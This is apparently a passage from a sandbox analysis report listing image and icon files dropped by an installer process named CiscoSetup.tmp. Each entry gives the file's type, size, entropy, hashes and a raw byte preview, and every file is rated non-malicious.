                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):1916
                                                                                                                                                                                                  Entropy (8bit):7.856747119568193
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:22S/53y4Zw3U0f7kxCsJUAxuLYSze4OnbQipPVeOh2JaM9:2lA6aU0fITJUA5Sze4AbQuPVmJaM9
                                                                                                                                                                                                  MD5:88A7B064DF22129CF129C4C589E1A92E
                                                                                                                                                                                                  SHA1:FE205F326656F8468B6FF7B9702B26E0BA450D35
                                                                                                                                                                                                  SHA-256:2E7D51E65DE4287C47C4BA96A394FD678F56F6A4BAAD7E35407BDD7D52DE500D
                                                                                                                                                                                                  SHA-512:87015E250E1659A0C5A90C85F85D01DC3B19AE079BA2574A2F6276AFF97E89A6B90BA5AB855EBC7B29AAB26C4ADB64B44EE64E210DCD0A02CCE70529D0FC3910
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...e...e.....T|-.....pHYs...#...#.x.?v....IDATx..]=r[7.....eJ.Kg.M#..~>...H.. ..8.O .L.....T.......p.&.....P.7.G....a..X,...........m..}7:...9...o.u.7.9.,....3...>.x...^R...........y...F.."eC....dzk...5.T.).hHD.US)L.`..x^..eIA2~...`..W.g%.T..ndT.u.d..r.[r.6.6PM.=...|....<..9..j.$'...GJ7.J...s..........<..3...Ip.C..'.....9.....G.H..C.'..n.._&i.!-)....v......'M..p..=M........=..4R...7.$b.;.iH..9.Q.....]P.%.OBL|R.............j.T....Lc.:.):B....f5P.]+..c.>.....!.Tz8.P.N.#..@nw0.H....$.:{...K.. .%......xG...3...OA..,.9..u.b.....<....v.H./.....k~.o...8.%.'.....w.'.'.%....!t.{........).oL...y?_~...K....>j.....]3.%...$.Cr@....l+.`...Y..._0v.4.s...@3._...]{n..)...wRpO....%.w..h2.....v...p/.}..#j.@.d.t.F.HA)..`).r<.....'...cq..WI..>...qy.......h........MJ..B(W. @....\1.SK...pz.kL......2{"hF...H..'.m"........K..2...).3a.....5.NR.an.\}.t6..is0T.&....2...6..H..U_6..E....$g...S..Nm..d+qp/dI......r.b....>....q/.8Qm..I.......%.P......I...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):421
                                                                                                                                                                                                  Entropy (8bit):7.268682924293009
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6:6v/lhPZqI9EI0An9BZXg/f/8q+psYee5BtD9n1XOoLZNxdj8hVHPHQHEPisVp:6v/7kNDC9EoRtBthgwTSrPXPis7
                                                                                                                                                                                                  MD5:E36649875C18E56654D70D70405A64C4
                                                                                                                                                                                                  SHA1:F5AFE1F32062F5F8F3C036BC4C41FD4056ADE29F
                                                                                                                                                                                                  SHA-256:794A18D1D80F273108935EF4A9F1B1449EFD80E79DFC1546A410998CB2121933
                                                                                                                                                                                                  SHA-512:2EAF13B01B63712C50D5FAF9B5785468BC8444EDE766F9F89FDECAEAC5CE003A7962B7451607AA23064E5EB4E2DBDB3568713681BA778AFE1CBCCC8DA07426B4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR..............w=.....pHYs...........~....WIDATH..U.m.0..".`...n@&..N.J..e.Ke.t.....x.2.#T.v...Z=)R..w.>.3r..*~.....k.k.).q....^.....`.k..'.tG.......X.:Kf..=..7-........Md..`.....L.H.{..K.%D.~.i.$.F..z....*]Q....Y@.f..D...C|j.!\gi...q..R.1...2..K.....=..,..%...p+.(iW....#......r....N...=........C.8[..\<.a....2[n....B, #...u.09......a...;........._U.)K2...pb.LW...~^.......hSX.....IEND.B`.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 301 x 301, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):12558
                                                                                                                                                                                                  Entropy (8bit):7.968059020803266
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:uop8Zgd6lZbxmfVR68Sj8p3f/NMolH6FeIB9OxW:uo6Z4Ic6potlg
                                                                                                                                                                                                  MD5:D30964E871F60B296F5109215FC341DC
                                                                                                                                                                                                  SHA1:365DDAFC27D304BBB3B8A99D0A62504E5D2D0B03
                                                                                                                                                                                                  SHA-256:16FDE630F3C55080422FE6965CE08D3CA85168655C73E05E3F9B7C00DC14507A
                                                                                                                                                                                                  SHA-512:22E918B1187909FCF80ED6ED091ADFA6081E95A2482F6676DA84D8CD580CD4557D9FBDCDD948ACEA03A8001BABA4653F4C735672F668DB9D226F9362A079358E
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...-...-.....].6.....pHYs...#...#.x.?v.. .IDATx....U...hr!#.D'..i.L.$.l..V...q+.....H..l,.h...T.v.Ui..@..,.....Y.*.1.i........BX%:..4.n.O../..y....s.s....{.}.....>.}.a|R(.!.!e....|.:..Y.Jm..g...E.....S#>...R....0..[Dt.....R...i1,Z9BDJ5B...b49e....b..Z.`..(B.lq..Bq...!b.#Zc!..,Z..P..,....R:S.#.MDe{.Jm..|.L9,Z).B...E....Y......xX..E+%..|..M."eD$u...z.y...}..H.' ..Z.....X...P...Buk..P."d.9x ......uq..;t..q....Q.y...=..'rv......h.F.B5...h.%....K...>...@........7i.....8t8..e.3..-.(K....*DF..+F..>.4nTZ.&G \.......[.G.......|3`.J.a.#....* J..&..e|....x...g}..L...VA...O.....Q.\.U..{.He-...Dkk.NK..w..N~.z.'./N.c.E+&D..B.....~...4nt.#)U.}ml.fEc.|....Z.....,Z.S(...)`.Z*.U}...5}....cGa[_....z...8u......bu_....*~.6ni.Ak..D`..ul.G...F._.("..b.ToZ.D.7g:.U.....L..x=....-.....0...fN.J...j...=.. ^..B..,^.a.RD..+....*...*..........}.xi.E+$a=+...n.*...G...uG..rB.z.a........A+...`6.Re.D\..B..'D....0(,Z>.=.+E..o.....l..Z......T..*6..B..hyPf.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):2860
                                                                                                                                                                                                  Entropy (8bit):7.914852791051157
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:1vgVWGnIUiSbzr6C6bm/8B3fMKfxYtg+hRKdQr5iQGAOUnonGVY5Q14pUcblw/Gu:1YIUxbavbmUZxYtVXABUno7Q5cblwDSI
                                                                                                                                                                                                  MD5:DA68BAC3A525CC1ACE0BC4836A49D3D5
                                                                                                                                                                                                  SHA1:5C7D343913F75C7595BBA487031056B54F2AC6CE
                                                                                                                                                                                                  SHA-256:DC088A5CD630537A875466B7278DDDE0E54203C733D0950F67B0D3896B671A09
                                                                                                                                                                                                  SHA-512:A5F4BCC1A2CADF82927CEBD0373694086BDF955D7B755118255AAE3FA7CF7EB05748C81B35A759A8202991B2B2D5F77709FC84C58D0554430BE3AE8B51519264
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...H...H.....U.G....pHYs...........~.....IDATx..\.L......E.ki....`S.uB&HRP......E7.5.f.K.t.e....lV..ve.M'..@..."..t).U.R.(r@I....^.......;...._B.......w..{..y...Q.a.df......G3.T......&.....`.q..2Z2..h3...Q.....d..*q..b..?.9}......6...I5DT.7u....B..i...._.........\.>..........U..r.=.]....rb. !'{-m...DO..N.\....,.'.TO.t!..X...(';]......KT.N.pE]..1AFK&\.(.%.....!iK...^;V%..6.u..CB...Jh.\....f1...*.........&..2Z2!..`5.r7.+.wSlL....?.......N..@..8.M6..2h=.h..ID.bc...YRD?}....4...O.=.O..I+.....sd..d.=.o.D.&.89...WD.,=H..)z.'`...xZ.n...vD....l0Ynj!.g...C.9qd..7.....D..M:..y>Y......9.I..i.$..=....C.G..lu.....L..u.`..b.{=>Xp#).`....o.]^U.x.s56&:....*..w..rI0W'...C{uO7f.h.4i`p.!..jqR..k .L.:0\.=.n.7#K0C.U.K...X...b<}x.A .._....?.*.=..a.n....o..v=.N..9jQ.C.....kJ2.,....?v?f.A.../^h.,=.).Df.P..p....$..{Dz...C:v..t.......[G.a..>3.R...=..Z....X....}%.CV...J....p.6<......}v....T..3.5._].....c.V.~..A.z.....x./^..q....?.......9 ....5.?.Xy...s ..
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):51094
                                                                                                                                                                                                  Entropy (8bit):7.977081753425093
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:UoAL5K723jk6waeSXMFYcQotAtZJqyGlOk6bAfb1:Uv5YAjkCeS8u6tAnwwTbe1
                                                                                                                                                                                                  MD5:BBD0533637DA4102A6DC250FB20D6FA7
                                                                                                                                                                                                  SHA1:B78DC64053313A61F3C25550D17C2700923B1EF0
                                                                                                                                                                                                  SHA-256:C4D28DB251B9D72B2EF84EB9774F028FFDB65E432451E79E50D51A497D8196B9
                                                                                                                                                                                                  SHA-512:A3B17D20439BE297AD034827FD5B9EC40DB2D3B597D76431F29AE4C72C2647546DAB7696A05B3007C6796862CA67F7EDD41D8826C0D41BB55139A1D58CE23C46
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR..............x......pHYs..........+.... .IDATx..wx.U...wf.{O $$..z.".J.......YEEE..." .TAd..^BM..RH.}2...dw...U.....=.;...{.....s.=...D".8.Eq....._....#......u)..X..T.....*@.......7....(...|......7...r~.U.... ..7.(.B..*.X.B.@".PCo....@...`...8...8w.r..w.. ...b...IB..9.$...H$.d.E...*_.{.>@.o.}5 .|U^....~..<.....;..@..'.P.H.. .X......u...+..:..r.......p...M.."K.I"...Dbn#......@..o.~..sv...;..p.......T!D.T.D"......_U....<.........$.C....$ ........B..T.D".....3..T)_.?.t(_..be..|g.H.Cp.H.....D:.....x....D.5...o...".............R5...H$.o.5@.P...~'.%................Z...t.$..0..@..........%...U..\......R-...H$.c..........G..I.H....o.l....L.B.K.H.. .X........'..>..Db(y.m..~......t.$..3.....[.=...s.K$.......N...(.j.H.@"1...@..7..6..*o*]I..n.?.X...BdK.H.. .......k.<.~..EjFb..?"....be.#.t.$..n...'.q@C.|.R3.+..}..U`.pR..J.. ..o..>)O...Db.....JxQ..H.. ....k.~..;...'..Hl...L.G....]&..H.@RY........r./....?....B.\...t.$.n.]...x.Y.B.V$.........B.I.H
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 32 bits/pixel, 16x16, 32 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5430
                                                                                                                                                                                                  Entropy (8bit):3.7071518309363354
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:48:rtQAZDlpb/oRjRgvFBvOcVYVWZahUNZGIJMWz6izv2dBtj33xNCpK0v6wxrf0Dgk:rt/Md6vFBXKWIhUNky4X3IrvX1sDgro
                                                                                                                                                                                                  MD5:1C98B43E6778943A5358BE61A90BA74C
                                                                                                                                                                                                  SHA1:5267802FF8108EA1709CFEB6C156A7AA5D6140BC
                                                                                                                                                                                                  SHA-256:BCE250F3AEA36B7A76C5D4D73B03CE83A7988BBFB6F6AA69C92475C39DABC22E
                                                                                                                                                                                                  SHA-512:7C10E7FE2D1A476D0A923937597B95D505FBE6978ED4518A99F1FC391CB6281CE8A0F94F3772C83ABAEF916B6834BB5490833BF60BB3B9FA67D61CA0B7C16015
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... .... .....&......... .h.......(... ...@..... ........................................................................P..........!...................................................................!.................................... .....................,3..................................................................#,.............................................kY.M'..M'.. *%..5C..........................-9..-9..........................(2..0;u.......................0............cB+.M'..M'..M'..X5..z]J......y.......................1=..1=......................[q...'........................0.........xh.M'..M'..X5........................#......................................................DU*................... ........nP:.M'..M'....w..........................,0..az...................'...'..................7F..9G.............................z]J.M'..X5..............................................................................|....#.................................M'..X5
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 5334 x 1067, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):83111
                                                                                                                                                                                                  Entropy (8bit):7.138058183615623
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:VC5Kuc25xWuSyREGUa7eZoQZBrMd+Wdl6P1NsDO1U:VC5Dx8yRTeBZW4k9DOu
                                                                                                                                                                                                  MD5:E9352AD002DC71C84B605700A6684C46
                                                                                                                                                                                                  SHA1:312487A0D0778CB57EBC0B5ABBA29CB6C31187FA
                                                                                                                                                                                                  SHA-256:55E9F9561425D5B5994506DB5932FF3C87ACAD729BB4CC043EE99EFB85484E0A
                                                                                                                                                                                                  SHA-512:CAC779DCB625BF8C8736686407BB81DB140434FB16DC98144E113F2822AB3A907A7E7CA63751D73604B11EF0F0DFCB6979833DE75B160542CF7C969F39533867
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.......+........%....pHYs...#...#.x.?v.. .IDATx...kn...`..^..#?N...$..d)..c.5d/..ASy.q$Y....y...3.D........................................................................................E.....GW.....P..Z.nC........0\./_Ow?v:...`..x.j=..9.......@....5q....P5.&...hl.....&...hl.....&...hl.....&...hl...M..\v.......P.{.g.h}.;2.@...e#........Xr8.n.....s.er..<.4...fNi......H3.r:.....?u$`'.~.~...dsHN.<.s}.0.qy...x.A<..}7L.y....}^~...].w([U.M`.5..1... .pB.F.>IMc..|..y.].......7...^46.a.....p.c..-...{.`.....,..#x...>I.:......a.........|M.-..k..7:...;...C.........?>~>..)........o9(O.i.'.{.n..~.q....2Q.....W&.....R....Il.....;..~kH|_.R......O....2..}jp....f.1!%..OY....n...F.lfL....W....'.CH,.....g/..y>>~.+*j...$e........Mb..;.........Z...A.:.~...Y|.o1P.A.$...)....~....S;.RR..@...W.&.}.q=.N...:[.C1.5.=...r.U&+._.z.O~o........m......}..t.vcR....u..{...&P..7.......c<....15.?u..5..U.c..........:.*.N.MhPw.=..K..y..>vc.....{;....F>..k......,.-..N...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 3226 x 2226, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):76349
                                                                                                                                                                                                  Entropy (8bit):6.476357962983417
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:FVQKRdUmqPkx3KW18PXAvBXZc1cgOdRAXYg3w9pxiwzL6s7UJrwu4be/NG0Zpnel:FVT3K1PQx32w9pUwCKu4k5Tne54DD+
                                                                                                                                                                                                  MD5:FC85657D1B695A1BBF554859C7073AB6
                                                                                                                                                                                                  SHA1:DE271697015CD2BE237C3F112A2FA8391C7FE0A0
                                                                                                                                                                                                  SHA-256:734ACBF5F095BFC5092CCDE8C2721477C6B6F8C4BEC6E14F7F6E11012DC648F9
                                                                                                                                                                                                  SHA-512:AD8DA7E48ED1288FC24B7CE87B7F5557D1055C141B385E8BDC37B0BF56FF1BFFDF3516759DA613BD066EEB64C25C43D0D1609C3EC5AF7900081BA9083BF4361F
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............:z....pHYs...#...#.x.?v.. .IDATx.....H. Pi....`...`....<.`!d.`.........X.k.x@y.....KM.{.T.H.Dt..4\.2.....................................................................................................................X.V.<.n........a.9\ ...Af[.7K.C.q.C.K....T..P7.N.k...P.S..O...5..'....1...<8[.8$......@....A.(..!......@....A.(..!......@....A.(..!......@....A.(...j,.....}.q..}...ZU.....y.......c_..U...\].....k.2\.}.j..V7........K.....C.|..{.p^/.m".'.....q...>..J..}wJ.v.....A.-O=oA%o.J.......SG.H@.h[.X7|....P .O..%.P..B@. .... .....P..B@. .... .....P...~(g.k..KjoW...zt....v....('..........2..3.}k.... .-.7.:ts-h..u...X...,w..V..;..i.3.!.<.>..mg..{7>C@....Ye...A@...rS3.A@. .... .....P..B@. .... .....P..B@. .... .....P..B@.t....y......!G...9gg...B.../g..;.%.|p...S..5....&.o'.......6.('8.BZm?...}..T.S:.Z.<..:v..=.5.....}ku.D.3.C_.......F.r9....*.zG=.....c....q.......j?....r.\.G...[^..!......@....A.(..!......@.
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 3563 x 1383, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):83426
                                                                                                                                                                                                  Entropy (8bit):7.358868361468608
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:dixvvTkILgVLxXyJl/WOwiu/PK7KT+vWJv1RASI/sH4PIfeN9Oo:avvTfg5Fyv/WOwiurQWJ9e0H4PoeTOo
                                                                                                                                                                                                  MD5:4AC53A86840972B2C8E661710290F3ED
                                                                                                                                                                                                  SHA1:D305EC46D2A933DA35D0634B1C23B2657A70CA88
                                                                                                                                                                                                  SHA-256:647EFCB4DF9273570A803D5818A37814601B06D41D77A51B61461B12958F028C
                                                                                                                                                                                                  SHA-512:86CCC7CA3A4EC721DB91B498E05C4DED79B3BF88E3AF5BCA4198380742B79C69AFF7BCDE7CE15FC09D1C976C37E56298EC3BECAD9254242ACCFAD9CBD6159BA4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.......g........@....pHYs...#...#.x.?v.. .IDATx...Mr....N*+.*....O....OeM..W..;Hy.^...Wt..M..$....r]_Gj.A.................................................p.....?.=....._......\..?....|;......T.T*..=S.....i.[.........@.T|......SQ..p**>.N...l.e..>/.2...\.f.."../.2.....i..@atu..\.............Tv..R.........W;....[.....^;..}.O..+....C.7.@:Y..#O....LE..>....x..B-....LE..?..z..Yk.s.g.|.1/.>....}.5..<a...Y..Z..J).......}.....W|.|...!..f*>&.j..f..z-...9..Q.R#c|..m..ww.N....F.E|.......?...?w.p.t....B+...}g...G.1....F...2.........v.M.........]...E..%.us........B...9G.K*.._..5F@.<?....C.E8.-.\[.c.....=.i..PZ53p......<...o.;..O7..w..T....X...\..k....{.....Dv..Y.1..MI.......R......#....0..S.%T|.3..5....|..Q....46.....6ml<..^_.2....k.SJ.>O...A....U...g.\.F.*#j.m.7u......-!.p.4..........!...[..Rh.?......F..5.C....S.W..B~7...0..|.|.*...J.Ze...P...H].u.6....p......P.:i.F.g..$GE...*...ch.3q......J`.wo.,..^......efy.a....s.i.P.l*...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 1024 x 365, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16443
                                                                                                                                                                                                  Entropy (8bit):7.760065707691873
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:lqb0tEZvDwb6EjHGVbAxe76N2Tuzy8xvyu6:lY02FP8nsUxvyu6
                                                                                                                                                                                                  MD5:E786715A35FEB88334AA7FAA35F70248
                                                                                                                                                                                                  SHA1:2BB7D79511CA0099549DAA71263909D61789B54D
                                                                                                                                                                                                  SHA-256:0D5106D9C61EC53AC64D4663204A75F5257B41E24991F1D6CCD50471CF81C341
                                                                                                                                                                                                  SHA-512:4DF4F567FB4B1184610D1884D13F75C474757641F64CA05B6333391C12B7AFA0D7889F4DB374AB54F69E262EE4B12FB89A12E037A8F2926E01ED457D233DE3F9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR.......m......O......tEXtSoftware.Adobe ImageReadyq.e<..?.IDATx...r.H.(l...70.l....L..60}....VrRI.I$_..+.&.:..`kBk......^........H..G.|.*.l}.@......,.........................................................................................................................................................................................................................(.....?...i..........B..]......5._O.L/.2}R:.....}.....i.._...R.+..ez...../......?)...)...[....?..S.......x..g.x7.z...T....H...D.... .....H................ ................ .....H.....=...v./...I..4.......S..:..|..1..._.+.s.......hF....y.....!.....:..<._...).....&.P...e..;l.c... ..W.8.... .*.....1@.l.h...'V...k..IL.L.r..h......q...g];/.T.K..rw=...%?>....kM... .0....IB.yr.....;............... .....H.......... ........n._.......-....,....3..,..Q..L.J.2.._..,..2}R2....@..*....?>..*.~.X/....4...k...L/.2.+...4...._...).....(.)......y..@.@.. ......... ..b..WB....@5..W.Ym...?..)...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:MS Windows icon resource - 2 icons, 32x32, 8 bits/pixel, 32x32, 24 bits/pixel
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):5494
                                                                                                                                                                                                  Entropy (8bit):1.0422788649872297
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12:xh4r3rEO9SEEEEEEEEE2888888888Bsff:xKfgH
                                                                                                                                                                                                  MD5:B4FE215E5858B187A041DEABB2E1CB04
                                                                                                                                                                                                  SHA1:E8F16887E8BFFF243EB1AEAAF21B382CD0DFD9EE
                                                                                                                                                                                                  SHA-256:9FC38B41A0D11FF64348F0E125692091D478E6E4F1C368A4E01863D49F87BB87
                                                                                                                                                                                                  SHA-512:371FEA20A067929B21543490CE56C370BE8477B40630D2EE0BA613FE91A485D083DCB0FE4B0E76465576935F0311CC65832B48B3487F5C2B83ABB4E8B9AB4270
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:...... ..........&... ..............(... ...@...................................BBB.XXX.cbc.nmn.yxx...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 3226 x 2235, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):75452
                                                                                                                                                                                                  Entropy (8bit):6.447447333863436
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:i6ORO3YabolewEiM0aJqCrvbURQDEb6b/4:ik3dolewM0agCrImD3w
                                                                                                                                                                                                  MD5:9C6F8BF269230734B04A82F610B9B912
                                                                                                                                                                                                  SHA1:2B81B2C45C94CA29330ED0223F21928BEAA66A3D
                                                                                                                                                                                                  SHA-256:3A5C49B91E68BE97E158E7A35C54996C45F1E9E8432927AF476D5F85BCF7B67E
                                                                                                                                                                                                  SHA-512:4F24CAD91616F50E1C28E0D44C66B0F6E6C89F38E9A07B81C43810862F3E76E77D897D6B06BB7CD2FEFDFC1E01011FA1CEBCDF2E6E53F347E98B9CEF7FCBF1C9
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............k.....pHYs...#...#.x.?v.. .IDATx.....H.(Z.1.<....C{@{..\..-...X.....<.....,5.!)..2S.x(.^k.LS.P....4..................................................................................................................%Y.]"".......c.K. ..X.rH'./.5.#...]..........O.S...2..s:...}P.%B. ....Y.P....@.....0.......,.(.da@. ....Y.P....@.....0.......,.(.da@. ..JG.W....w.$...^.o|.[..\.G..=.........k....#..SJ...nm..h..O7%c.2....)....hh.;.Z...e^...c.a.q.,....{.oe...Q..a5g..^.6e^...#B.k..a/%..{aL....0.......,.(.da@. ....Y.P....@.....0.....e..o.{..+".L...wg..~i..PN0......-..z.Z.Yg)..1........m..7...r.Gw..7.$..N.0.*.sW......d@...4..i...P.@D|;5?t0.+........P....@.....0.......,.(.da@. ....Y.P....@.....0..../...7.....kW...i..T...6..F..A#+..s.......(.`....V.-*Z.kCI..>.PN.....eE;.?ou.N...}.k7..\........R.X...w.....}_...#.|..s^....&..z....Z.....8.d)`..9kY.. ....Y.P....@.....0.......,.(..9.n.np....y{W..\.....N0p.j .4.'..&................
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:PNG image data, 3226 x 2235, 8-bit/color RGBA, interlaced
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):76615
                                                                                                                                                                                                  Entropy (8bit):6.470162664157233
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:qGdM/siSNo+PH4MwDCfwvTaBFdzIWxtLudTc8OuTk3kMgH/0:q5sioYMwL7aBF1x0dTcqTFf0
                                                                                                                                                                                                  MD5:BCB76C77C4A705631EAECEAD63D6A8EF
                                                                                                                                                                                                  SHA1:915C69643CCCB39E4DED27AC866C3F6872D740A2
                                                                                                                                                                                                  SHA-256:C5A9EB1365BF8D546649281DE3C9E31FB27F9E39B54BC860961F026E95D653B2
                                                                                                                                                                                                  SHA-512:07349A6E550BDC44091329DF5303EB9BB845E54926346ACD9D5FA74FD9F596E73B3D04FD1098079564D4EEB9FBB03F7F9126C0D16433DE9456C5556741B06121
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                  Preview:.PNG........IHDR...............k.....pHYs...#...#.x.?v.. .IDATx.....8.(`.T.E...D0..n.............\..;..`G.'...2.....W/.?[.$.y..j...gY.......................................................................................................................W..Tus7..%......m.....Bx.Bx.w......P.QU7.B.gW...k]?;T....J.s....i`9g...m...R{,1e...S...+3V.P..@......"......@....Q.(.D!......@....Q.(.D!......@....Q.(.D!......@....Q.(.D!.............G.<...k~..~.B.p....}.d(........>..V.7......~.&..m[...(.{s[.......S..=.0.>..........0p.......aP.4...R.&...I.K.s......=...=.K.Vu.".b.l...Q.(.D!......@....Q.(.D!......@....QX..D......1\h....}}...;}|>.e....;..\t.tE.........9"}|9..&.m.S+...-m:.C3y.K..!..b....mi.....b.>~;..f...f.....S.P...g.......P..B@. ....(.....P..B@. ....(.....P..B@. ....(.....P ....%.P...e......u;.k...&.......=.....h..2(....=..%..A....yH..-..}<...IX.=......yO..U....>yImj[......'.;...B@...i..-.S.n..tnk..m.:..>v......5.g.SI'..f.K.U..e.{......6...+.3y..-:.x..f...
                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\is-0MUMO.tmp\CiscoSetup.tmp
                                                                                                                                                                                                  File Type:JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, baseline, precision 8, 1260x1024, components 3
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):399779
                                                                                                                                                                                                  Entropy (8bit):7.9639437199622165
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:NZGJOTaTKegfZjGiFfyHLyforThgWTZcWX1nQ8WMsETaVovwV:/JT6g5JyjrThgWTZvQ8lsvVnV
                                                                                                                                                                                                  MD5:DF0BDC3CDA98B3BE333FEB2A2770002C
                                                                                                                                                                                                  SHA1:D0FED726183EBEA0B535EE06A66805E7BF3C9386
                                                                                                                                                                                                  SHA-256:FD3413367D94F80DC520390C0971F9AA44003C9C6F32BCBC3303A6682D0B0175
                                                                                                                                                                                                  SHA-512:46F9DA519D7D8E1D192D9EB6082FBEAAE164EC58C97C22BB576B8DEEC387B57FFC8CF8BF75412C8FD2B30B9962B96070A679F2E26558099B5DB4411A59E0386D
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:low
